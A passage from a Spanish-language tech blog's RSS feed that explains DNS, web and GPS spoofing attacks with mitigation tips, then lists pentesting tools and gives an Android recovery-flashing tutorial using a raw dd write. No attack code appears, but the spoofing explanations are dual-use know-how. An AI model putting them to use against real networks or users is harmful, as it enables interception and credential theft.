nombres de dominio, el cual se encarga principalmente de resolver nombres de dominio o identificativos a una o mas IP asociadas a un dispositivo.Este ataque consiste en realizar un envenenamiento al cache DNS, modificando los valores establecidos para asociar un nombre de dominio con una IP distinta de la verdadera. De esta forma todo el trafico de ordenador atacado será redirigido hacia el ordenador del atacante. Este ataque esta compuesto de dos partes, suplantar la identidad del Gateway, por medio de un ataque &lt;a class="bbc_link" href="http://%22http//www.guatewarez.com/2014/01/spoofing-suplantando-tu-identidad-v-de.html%22" target="_blank"&gt;ARP Spoofing&lt;/a&gt;, y hacerse pasar por el DNS mediante diversas herramientas como dnsspoof. Este tipo de ataque es muy transparente para el usuario y bajo circunstancias donde el sistema no se encuentre bien protegido, se tendrán buenos resultados. Este ataque puede ser empleado tanto en redes hogareñas, como en redes empresariales o publicas, y puede ser utilizado para obtener credenciales de acceso a sistemas, apoyándose de otra técnica que ya veremos mas adelante como lo es el web spoofing, de tal forma que el usuario no notara la diferencia ni el la pagina o sistema que visita, como en el nombre de dominio.&lt;br /&gt;&lt;br /&gt;&lt;a class="bbc_link" href="http://%22http//www.youtube.com/watch?v=peUTYBdGHiU%22" target="_blank"&gt;Realizando un ataque de DNS Spoofing desde Kali Linux&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;La efectividad de este ataque suele ser muy alta, pero para evitar caer bajo un ataque de este tipo, ya sea porque estés conectado a un red publica, empresarial o de tu casa, si quieres hacerlo manualmente puedes realizar un ping al nombre de dominio, si la respuesta es proveniente de&amp;nbsp; &lt;a class="bbc_link" href="http://%22http//www.ietf.org/rfc/rfc1918.txt%22" target="_blank"&gt;direcciones privadas&lt;/a&gt; es porque estas sufriendo de un ataque de este tipo, aunque claro lo ideal es utilizar la tecnología y para ello puedes implementar SecureDNS, para evitar caer bajo este tipo de ataques.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (7/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Ha llegado el turno de hablar sobre el ataque de Web Spoofing, este método consiste en suplantar un sitio o pagina real, con el objetivo de visualizar y modificar ciertas peticiones que realice el navegador de la victima incluyendo las conexiones seguras SSL.&lt;br /&gt;&lt;br /&gt;Este ataque busca engañar al usuario, a fin de que este pueda brindar su información en los sitios falsos que el atacante muestre ante el con el claro fin de robar la información, y esa información puede ir desde tu cuenta de correo o tus credenciales bancarias.&lt;br /&gt;&lt;br /&gt;Por supuesto este ataque debe de acompañarse de un DNS Spoofing con el fin de realizarlo de forma mas eficaz y eficiente y que la victima no dude en ningún momento sobre la falsedad de la o las paginas que solicite&lt;br /&gt;&lt;br /&gt;&lt;a class="bbc_link" href="http://%22http//www.youtube.com/watch?v=Oqid39XjtUc%22" target="_blank"&gt;Ataque web spoofing&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Una forma útil para mitigar este tipo de ataque es usar Anonymizer o Mozilla con SRD y por supuesto algunos sistemas antimalware tienen soluciones para evitar estos ataques como Kasperky. Así protégete sobre estos ataques, antes de que alguien pueda aprovecharse de esto y sacarte tus credenciales. &lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (8/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Finalizando esta entrega ha llegado el momento de hablar sobre el GPS Spoofing,&amp;nbsp; el GPS, es un sistema de posicionamiento global el cual se basa en los parámetros de latitud, longitud y altitud con el fin de determinar la posición de un objeto en cualquier parte del planeta.&lt;br /&gt;&lt;br /&gt;Un ataque de este tipo busca engañar a un receptor de GPS transmitiendo una señal con un poco mas de potencia que la señal verdad que envía la posición correcta del objeto. Al final el atacante podrá brindar un ubicación distinta y plena a su elección. Este es un ataque bastante peligroso, por ejemplo puede utilizarse desde evitar que tus padres o tu jefe se entere de en donde estas, hasta secuestrar algún vehículo u objeto guiado por GPS.&lt;br /&gt;&lt;br /&gt;&lt;a class="bbc_link" href="http://%22http//www.youtube.com/watch?v=ctw9ECgJ8L0%22" target="_blank"&gt; Secuestro naval por ataque de GPS Spoofing.&amp;nbsp; &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pues ya se han realizado diversos &lt;a class="bbc_link" href="http://%22http//nakedsecurity.sophos.com/2013/07/31/80-million-yacht-hijacked-by-students-%3Cbr%20/%3E%3Cbr%20/%3Espoofing-gps-signals/%22" target="_blank"&gt;ataques para secuestrar un objeto utilizando el GPS Spoofing&lt;/a&gt; también se tiene el incidente RQ-170 el cual fue objeto de este tipo de ataques. Aunque para evitar este tipo de ataques se suelen utilizar GPS con módulos criptográficos de keys, este tipo de tecnología por lo general solo los militares la disponen.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;Source: &lt;a class="bbc_link" href="http://www.guatewarez.com/" target="_blank"&gt;Guatewarez&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2014/01/spoofing-suplantando-tu-identidad.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-3grkHqYi16k/UstpkJ5ClZI/AAAAAAAAAe4/lrHCmaTztE8/s72-c/Licencia.jpeg" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-4759306697243757349</guid><pubDate>Wed, 15 Jan 2014 13:45:00 +0000</pubDate><atom:updated>2014-01-19T19:31:57.148-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux</category><title>BlackArch: Distribución para Pentesting</title><description>&lt;div style="text-align: center;"&gt;&lt;img alt="" class="bbc_img resized" src="http://www.blackarch.org/images/logo.png" height="49" width="38" /&gt; &lt;b&gt;blackarch&lt;span class="bbc_color" style="color: red;"&gt;linux&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;BlackArchLinux&lt;/b&gt; &lt;i&gt;es  una distribución GNU/Linux para pentesters e investigadores de  seguridad basadas en Archlinux. El repositorio de paquetes BlackArch es  compatible con una distribución Archlinux existente instalada.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Estas son algunas de las características de BlackArch:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· Soporte para i686 y x86_64 arquitecturas&lt;br /&gt;· Más de 600 herramientas (en constante aumento)&lt;br /&gt;· Grupos de paquetes modulares&lt;br /&gt;· ISO en vivo con varios gestores de ventanas, incluyendo dwm, Fluxbox, Openbox, impresionante, wmii, i3, y Spectrwm.&lt;br /&gt;· Un instalador con la capacidad de construir desde el código fuente. &lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Pronto se dará a conocer:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· Apoyo ARM.&lt;br /&gt;· Documentación para todas las herramientas.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;También estamos lanzando una herramienta para buscar y buscar explotar los archivos llamados &lt;a class="bbc_link" href="https://github.com/BlackArch/sploitctl/blob/master/sploitctl.sh" target="_blank"&gt;&lt;b&gt;sploitctl&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Tenemos  una estructura de desarrollo relajado. Damos la bienvenida a las  solicitudes de extracción de todos los tamaños a través de &lt;i&gt;&lt;a class="bbc_link" href="http://www.github.com/BlackArch/" target="_blank"&gt;Github&lt;/a&gt;&lt;/i&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DESCARGA&lt;/b&gt;&lt;br /&gt;&lt;hr /&gt;&lt;b&gt;Index de ISO's&lt;/b&gt;: &lt;a href="http://www.blackarch.org/blackarch/iso"&gt;http://www.blackarch.org/blackarch/iso&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Sección de Descargas&lt;/b&gt;: &lt;a class="bbc_link" href="http://www.blackarch.org/download.html" target="_blank"&gt;http://www.blackarch.org/download.html&lt;/a&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;Mas información: &lt;a class="bbc_link" href="http://www.blackarch.org/" target="_blank"&gt;&lt;b&gt;Pagina Oficial&lt;/b&gt;&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2014/01/blackarch-distribucion-para-pentesting.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-1630420036732913078</guid><pubDate>Sat, 07 Dec 2013 13:16:00 +0000</pubDate><atom:updated>2013-12-08T15:36:56.012-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Tutoriales</category><title>VTELCA V8200: Instalando CMW - Clock Workmod Recovery</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-0rKgvhSJPtw/UqMatL5efMI/AAAAAAAAA3E/m_v6eyZJZdc/s1600/url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-0rKgvhSJPtw/UqMatL5efMI/AAAAAAAAA3E/m_v6eyZJZdc/s200/url.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;¿Qué es el Recovery?&lt;/b&gt;&lt;br /&gt;ClockworkMod Recovery (o también conocido como ClockworkMod, Clockwork y CWM) es un sistema de recuperación de datos  para teléfonos y tablets Android que te permite realizar tareas  avanzadas de recuperación, restauración, instalación y mantenimiento que  no son posibles con el sistema que viene de fábrica.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Introducción a ClockworkMod&lt;/b&gt;&lt;br /&gt;ClockworkMod recovery es uno de los más extensamente usados sistemas de recuperación de Android modificados ya que está disponible para prácticamente todos los teléfonos y tablets Andorid.  Este sistema ha sido desarrollado por Koushik Dutta (también conocido  como Koush), el mismo que ha creado el Android ROM Manager&lt;b&gt;.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;Instalar ClockworkMod&lt;/b&gt;&lt;br /&gt;Una  de las grandes ventajas de ClockworkMod frente a otros sistemas de  recuperación modificados es que éste es muy sencillo de instalar en casi  todos los dispositivos. Una vez rooteado el teléfono o tablet, podemos  instalarlo simplemente &lt;span style="font-weight: bold;"&gt;usando la aplicación ROM Manager&lt;/span&gt; que la podemos encontrar en el Market.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Instalando CWM en nuestro Vtelca V8200+&lt;/b&gt;&lt;br /&gt;Tras ver y saber todos los beneficios que nos trae instalar esta herramienta, procedemos a instalarla en nuestro terminal, lo que necesitaremos sería:&lt;br /&gt;&lt;br /&gt;1- &lt;a href="https://play.google.com/store/apps/details?id=jackpal.androidterm" target="_blank"&gt;&lt;b&gt;Emulador de Terminal&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;2- &lt;a href="https://dl.dropboxusercontent.com/u/63027427/CWM%20Recovery%20-%20Kodeinfect%27s%20Blog.rar" target="_blank"&gt;&lt;b&gt;Imagen del CWM&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Una ves instalado el&lt;b&gt; &lt;/b&gt;&lt;i&gt;Emulador del Terminal&lt;/i&gt;, colocamos el archivo &lt;b&gt;recovery.img&lt;/b&gt; en nuestra tarjeta SD, luego abrimos nuestro &lt;i&gt;Emulador de Terminal &lt;/i&gt;y tecleamos lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;textarea style="height: 20px; width: 631px;"&gt;su&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;Nos pedirá permisos de &lt;i&gt;Superusuario&lt;/i&gt; y los aceptamos:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://2.bp.blogspot.com/-mo_9FDeuKVg/UqMdm7O8nZI/AAAAAAAAA3Q/7dkuzU18ycE/s1600/Screenshot_2013-12-07-08-35-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://3.bp.blogspot.com/-jtcTkY5FPNg/UqTRR-TeCdI/AAAAAAAAA30/rt3Hoff2Jxo/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-jtcTkY5FPNg/UqTRR-TeCdI/AAAAAAAAA30/rt3Hoff2Jxo/s400/3.png" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Luego procedemos a instalar el CWM con el siguiente comando: &lt;textarea style="height: 21px; width: 631px;"&gt;dd if=/sdcard/recovery.img of=/dev/block/mmcblk0p16&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/--mXriKO7s6g/UqTQGHNXfmI/AAAAAAAAA3g/X6U7xaG7d6s/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="384" src="http://4.bp.blogspot.com/--mXriKO7s6g/UqTQGHNXfmI/AAAAAAAAA3g/X6U7xaG7d6s/s640/1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Solo bastaría reiniciar en&lt;b&gt; Modo Recovery&lt;/b&gt; con un simple: &lt;textarea style="height: 19px; width: 632px;"&gt;reboot recovery&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-x5FK2yfy6ic/UqTQOts9F2I/AAAAAAAAA3o/mbmzN8zd3a8/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="384" src="http://4.bp.blogspot.com/-x5FK2yfy6ic/UqTQOts9F2I/AAAAAAAAA3o/mbmzN8zd3a8/s640/2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;También buscar alguna aplicación que nos permita añadir dichas opciones al menu de apagado como podría ser &lt;a href="https://play.google.com/store/apps/details?id=com.siriusapplications.quickboot&amp;amp;hl=es" target="_blank"&gt;&lt;i&gt;Quick Boot&lt;/i&gt;&lt;/a&gt; o simplemente el metodo de Recovery Tradicional, con el terminal apagado presionamos: &lt;b&gt;Botón Encender + Volumen Arriba&lt;/b&gt; y ahí estaría nuestro &lt;i&gt;Modo Recovery&lt;/i&gt;.</description><link>http://kode-labs.blogspot.com/2013/12/vtelca-v8200-instalando-cmw-clock.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-0rKgvhSJPtw/UqMatL5efMI/AAAAAAAAA3E/m_v6eyZJZdc/s72-c/url.png" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-3467136788072755795</guid><pubDate>Thu, 05 Dec 2013 13:26:00 +0000</pubDate><atom:updated>2013-12-05T08:56:08.884-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>Canaima 4.0 - Disponible</title><description>&lt;div align="center" class="western"&gt;&lt;em&gt;&lt;em&gt;&lt;strong&gt;&lt;img alt="canaima 4.0" class="image-inline" height="374" src="http://canaima.softwarelibre.gob.ve/imagenes/pantalla4.png/image_large" width="640" /&gt;&lt;/strong&gt;&lt;/em&gt;&lt;/em&gt;&lt;/div&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="JUSTIFY" class="western"&gt;Se encuentra disponible la versión estable 4.0 del sistema de operación Canaima GNU/Linux, nombre código “&lt;b&gt;Kerepakupai&lt;/b&gt;”.&lt;/div&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;br /&gt;&lt;/div&gt;Las mejoras agregadas responden a las propuestas, aportes y sugerencias recibidas por diferentes sectores venezolanos: Administración Pública Nacional,  comunidades de Software Libre, unidades productivas, usuarios y usuarias, a través de los diferentes &lt;u&gt;&lt;a href="http://canaima.softwarelibre.gob.ve/unirse"&gt;medios de participación que ofrece la Plataforma Tecnológica del Proyecto Canaima GNU/Linux&lt;/a&gt;&lt;/u&gt; y espacios de participación comunitaria como la &lt;a href="http://cayapa.canaima.net.ve/wiki/doku.php?id=7ma_cayapa_canaima"&gt;última Cayapa Canaima, realizada en el estado Falcón&lt;/a&gt;. &lt;br /&gt; En esta nueva versión 4.0 se encuentran las &lt;b&gt;siguientes novedades:&lt;/b&gt;&lt;br /&gt; &lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Escritorio Gnome Shell 3.4&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Kernel Linux 3.2.0.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Servidor de ventanas X.org 7.7.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Suite Ofimática LibreOffice 4.0.1.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Navegador Web Cunaguaro 22.0.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Cliente de Correo Guácharo 17.0.5.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Programa de manipulación de imágenes GIMP 2.8.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Centro de Software.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Canaima Bienvenido (Basado en huayra-bullets) .&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Jockey (Detector de Hardware).&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Canaima Fondos dinámicos.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Editor de gráficos vectoriales Inkscape 0.48.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Lenguaje Python 2.7/3.2.&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;/i&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;i&gt;- Lenguaje Perl 5.14.&lt;/i&gt;&lt;/div&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="JUSTIFY" class="western"&gt;&lt;strong&gt;Descargas:&lt;/strong&gt;&lt;/div&gt;&lt;div class="western"&gt;&lt;a href="http://descargas.canaima.softwarelibre.gob.ve/canaima-popular-4.0%7Eestable_i386.iso"&gt;Enlace de descarga de imagen ISO con soporte a 32 bits (699MB).&lt;/a&gt;&lt;/div&gt;&lt;div class="western"&gt;&lt;a href="http://descargas.canaima.softwarelibre.gob.ve/canaima-popular-4.0%7Eestable_amd64.iso"&gt;Enlace de descarga de imagen ISO con soporte a 64 bits (698MB).&lt;/a&gt;&lt;/div&gt;&lt;div class="western"&gt;&lt;a href="http://descargas.canaima.softwarelibre.gob.ve/canaima-popular-4.0%7Eestable_486.iso"&gt;Enlace de descarga de imagen ISO con soporte a 32 bits para equipos antiguos (697MB).&lt;/a&gt;&lt;/div&gt;&lt;div class="western"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="JUSTIFY" class="western"&gt;A través de  &lt;u&gt;&lt;a href="http://tour.canaima.softwarelibre.gob.ve/"&gt;esta visita en línea por Canaima 4.0&lt;/a&gt;&lt;/u&gt;te invitamos a echarle un vistazo a esta nueva versión de Canaima. ¡Anímate a instalarla y a probarla en tu computador! &lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2013/12/canaima-40-disponible.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-7390824798456650790</guid><pubDate>Thu, 05 Dec 2013 13:20:00 +0000</pubDate><atom:updated>2013-12-05T08:50:57.321-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Herramientas</category><title>Recopilacion Herramientas Python para Pentesters</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-CiK6bODD3jg/UqB9MOaF1RI/AAAAAAAAA20/UnmSKmRiWkM/s1600/python_ninja.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-CiK6bODD3jg/UqB9MOaF1RI/AAAAAAAAA20/UnmSKmRiWkM/s1600/python_ninja.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Si  estás involucrado en la investigación de vulnerabilidades, ingeniería  inversa o pruebas de intrusión, seguro que ya habrás utilizado Python  porque cuenta con un rico conjunto de librerías y herramientas útiles  para estos menesteres. &lt;br /&gt;&lt;br /&gt;En la &lt;a href="http://dirk-loss.de/python-tools.htm" target="_blank"&gt;página de Dirk Loss&lt;/a&gt; podemos encontrar un gran recopilatorio de &lt;b&gt;herramientas escritas en Python para &lt;i&gt;penetration testers&lt;/i&gt;&lt;/b&gt;,  algunas de ellas sólo enlaces a librerías C existentes, es decir,  herramientas que hacen las librerías fácilmente utilizables desde  programas de Python.&lt;br /&gt;&lt;br /&gt;Sin embargo, por la difusa situación  jurídica en Alemania no se incluyen algunas de las herramientas más  agresivas (frameworks PenTest, smashers bluetooth, escáneres de  vulnerabilidades de aplicaciones Web, war-dialers, etc.). Por ello y  para tener una lista aún más completa, &lt;b&gt;vamos a ir añadiendo todas las herramientas que vayamos encontrando.&lt;/b&gt; No dudes en &lt;b&gt;comentar esta entrada si conoces alguna más&lt;/b&gt; y quieres que la añadamos a esta lista:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Red:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://dirtbags.net/py-pcap.html"&gt;Dirtbags py-pcap&lt;/a&gt;: lee ficheros pcap sin libpcap&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/dpkt/"&gt;dpkt&lt;/a&gt;: rápida y simple creación de paquetes y análisis, con las definiciones básicas de los protocolos TCP/IP&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://monkey.org/%7Ejose/software/flowgrep/"&gt;flowgrep&lt;/a&gt;: grep a través de payloads de paquetes utilizando expresiones regulares&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://glastopf.org/" target="_blank"&gt;glastopf&lt;/a&gt;: honeypot que se basa en un pequeño servidor web que emula cientos de vulnerabilidades. &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://oss.coresecurity.com/projects/impacket.html"&gt;Impacket&lt;/a&gt;: modifica y decodifica paquetes de red. Incluye soporte para los protocolos de más alto nivel, tales como NMB y SMB&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/knock/"&gt;Knock Subdomain Scan&lt;/a&gt;:&amp;nbsp; enumera los subdominios de un dominio de destino a través de una lista de palabras&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/DanMcInerney/LANs.py" target="_blank"&gt;LANs.py&lt;/a&gt;: herramienta capaz de falsificar y envenenar la tabla de ARP de un objetivo individual. Es multihilo y asíncrono. &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/libdnet/"&gt;libdnet&lt;/a&gt;: rutinas de red de bajo nivel, incluyendo la interfaz de búsqueda y transmisión de tramas Ethernet&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://bitbucket.org/IntrepidusGroup/mallory"&gt;Mallory&lt;/a&gt;: &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;proxy &lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;man-in-the-middle&lt;/i&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;extensible TCP/UDP&lt;/span&gt;&lt;/span&gt;, soporta la modificación de protocolos no estandar al vuelo&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/pypcap/"&gt;pypcap&lt;/a&gt;, &lt;a href="http://oss.coresecurity.com/projects/pcapy.html"&gt;Pcapy&lt;/a&gt; y &lt;a href="http://pylibpcap.sourceforge.net/"&gt;pylibpcap&lt;/a&gt;: varios enlaces Python para libpcap&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pytbull.sourceforge.net/"&gt;Pytbull&lt;/a&gt;: framework de pruebas de IDS/IPS muy flexible (incluye más de 300 tests)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://jon.oberheide.org/pynids/"&gt;pynids&lt;/a&gt;: &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;wrapper de &lt;/span&gt;&lt;/span&gt;libnids que incluye sniffing, IP defragmentation, reensamblado de streams TCP y detección de escaneos de puertos&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://secdev.org/projects/scapy"&gt;Scapy&lt;/a&gt;: envia, rastrea y analiza y crea paquetes de red. Se puede usar de forma interactiva o como una librería&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.blogger.com/null" 